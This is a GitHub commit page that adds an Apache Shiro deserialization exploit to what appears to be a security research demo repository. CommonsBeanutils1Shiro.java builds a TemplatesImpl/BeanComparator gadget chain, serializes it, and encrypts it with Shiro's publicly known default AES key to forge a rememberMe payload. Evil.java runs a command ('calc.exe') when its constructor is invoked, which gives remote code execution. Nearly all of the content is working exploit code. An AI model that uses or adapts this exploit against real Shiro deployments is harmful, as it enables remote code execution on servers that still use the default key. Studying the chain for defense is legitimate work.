Skip to content

Commit 2f9a637

Browse files
SummerSecSummerSec
committed
common
1 parent 61b770e commit 2f9a637

File tree

3 files changed

+107
-0
lines changed

3 files changed

+107
-0
lines changed

shiro/shiro-deser/pom.xml

Lines changed: 5 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -62,6 +62,11 @@
6262
<artifactId>commons-collections4</artifactId>
6363
<version>4.0</version>
6464
</dependency>
65+
<dependency>
66+
<groupId>org.javassist</groupId>
67+
<artifactId>javassist</artifactId>
68+
<version>3.27.0-GA</version>
69+
</dependency>
6570
</dependencies>
6671

6772
<build>

shiro/shiro-deser/src/main/java/summersec/shirodemo/Payload/CommonsBeanutils1Shiro.java

Lines changed: 73 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,73 @@
1+
package summersec.shirodemo.Payload;
2+
3+
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
4+
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
5+
import org.apache.commons.beanutils.BeanComparator;
6+
7+
import java.io.ByteArrayOutputStream;
8+
import java.io.ObjectOutputStream;
9+
import java.lang.reflect.Field;
10+
import java.util.PriorityQueue;
11+
import javassist.ClassPool;
12+
import javassist.CtClass;
13+
import org.apache.shiro.crypto.AesCipherService;
14+
import org.apache.shiro.util.ByteSource;
15+
16+
/**
17+
* @ClassName: CommonsBeanutils1Shiro
18+
* @Description: TODO
19+
* @Author: Summer
20+
* @Date: 2021/5/19 16:23
21+
* @Version: v1.0.0
22+
* @Description: 参考https://www.leavesongs.com/PENETRATION/commons-beanutils-without-commons-collections.html
23+
**/
24+
25+
26+
public class CommonsBeanutils1Shiro {
27+
28+
public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
29+
Field field = obj.getClass().getDeclaredField(fieldName);
30+
field.setAccessible(true);
31+
field.set(obj, value);
32+
}
33+
34+
public byte[] getPayload(byte[] clazzBytes) throws Exception {
35+
TemplatesImpl obj = new TemplatesImpl();
36+
setFieldValue(obj, "_bytecodes", new byte[][]{clazzBytes});
37+
setFieldValue(obj, "_name", "HelloTemplatesImpl");
38+
setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
39+
40+
final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);
41+
final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
42+
// stub data for replacement later
43+
queue.add("1");
44+
queue.add("1");
45+
46+
setFieldValue(comparator, "property", "outputProperties");
47+
setFieldValue(queue, "queue", new Object[]{obj, obj});
48+
49+
// ==================
50+
// 生成序列化字符串
51+
ByteArrayOutputStream barr = new ByteArrayOutputStream();
52+
ObjectOutputStream oos = new ObjectOutputStream(barr);
53+
oos.writeObject(queue);
54+
oos.close();
55+
56+
return barr.toByteArray();
57+
}
58+
59+
public static void main(String[] args) throws Exception {
60+
// ClassPool pool = ClassPool.getDefault();
61+
// CtClass clazz = pool.get(Evil.class.getName());
62+
byte[] bytes = Evil.class.getName().getBytes();
63+
byte[] payloads = new CommonsBeanutils1Shiro().getPayload(bytes);
64+
// byte[] payloads = new CommonsBeanutils1Shiro().getPayload(clazz.toBytecode());
65+
66+
AesCipherService aes = new AesCipherService();
67+
byte[] key = java.util.Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA==");
68+
69+
ByteSource ciphertext = aes.encrypt(payloads, key);
70+
System.out.printf(ciphertext.toString());
71+
}
72+
73+
}

shiro/shiro-deser/src/main/java/summersec/shirodemo/Payload/Evil.java

Lines changed: 29 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,29 @@
1+
package summersec.shirodemo.Payload;
2+
3+
import com.sun.org.apache.xalan.internal.xsltc.DOM;
4+
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
5+
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
6+
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
7+
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
8+
/**
9+
* @ClassName: Evil
10+
* @Description: TODO
11+
* @Author: Summer
12+
* @Date: 2021/5/19 16:34
13+
* @Version: v1.0.0
14+
* @Description:
15+
**/
16+
17+
18+
public class Evil extends AbstractTranslet {
19+
@Override
20+
public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}
21+
22+
@Override
23+
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}
24+
25+
public Evil() throws Exception {
26+
System.out.println("Hello TemplatesImpl");
27+
Runtime.getRuntime().exec("calc.exe");
28+
}
29+
}

0 commit comments

Comments
 (0)